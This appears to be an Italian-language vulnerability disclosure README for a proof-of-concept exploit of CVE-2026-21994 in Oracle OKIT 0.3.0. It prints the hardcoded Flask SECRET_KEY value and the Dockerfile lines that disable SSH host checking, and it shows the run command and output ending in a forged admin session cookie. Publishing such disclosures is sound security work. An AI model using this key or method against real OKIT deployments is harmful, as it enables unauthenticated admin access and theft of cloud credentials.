
Proof-of-concept exploit per CVE-2026-21994, che dimostra la falsificazione di sessione admin non autenticata tramite una SECRET_KEY Flask hardcoded e il bypass della verifica host SSH in Oracle OKIT.
Oracle OKIT (oci-designer-toolkit) versione 0.3.0 contiene due critiche misconfigurazioni che si concatenano in una compromissione totale non autenticata. Una SECRET_KEY Flask hardcoded esposta nel repository pubblico consente a qualsiasi attaccante di forgiare un cookie di sessione admin valido — senza richiedere credenziali. Separatamente, l'immagine Docker disabilita completamente la verifica dell'host SSH, consentendo a un attaccante di rete di intercettare le chiavi API OCI e le chiavi private durante le distribuzioni dell'infrastruttura.
1. SECRET_KEY Hardcoded — okitclassic/okitserver/config.py:4
SECRET_KEY='8980ffsd675747jjjh'
Flask utilizza questa chiave per firmare i cookie di sessione. Poiché è hardcoded in un repository pubblico, un attaccante può forgiare un cookie admin valido e accedere alla dashboard OKIT senza alcuna credenziale.
2. Verifica Host SSH Disabilitata — Dockerfile:41
&& echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
Il container non verifica mai le impronte digitali dell'host SSH. Un attaccante di rete può effettuare attacchi MitM sulle distribuzioni e rubare le credenziali OCI.
Esegui exploit.py all'interno della directory del repository clonato:
python3 exploit.py
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.
[*] Scanning Dockerfile ...
[!] VULNERABLE — SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.
[*] Forging admin session cookie ...
[!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1...
| ID CVE | CVE-2026-21994 |
| Advisory GitHub | GHSA-g6qw-3gmw-m78m |
| CWE | CWE-284 — Controllo degli Accessi Improprio |
| Mappatura Advisory Oracle | oracle.com/security-alerts/public-vuln-to-advisory-mapping |
| Riferimento CVE Oracle | oracle.com/security-alerts/all-oracle-cves |
| Correzione | oracle/oci-designer-toolkit#780 |
Scoperta e segnalata da Gouri Sankar A — g0w6y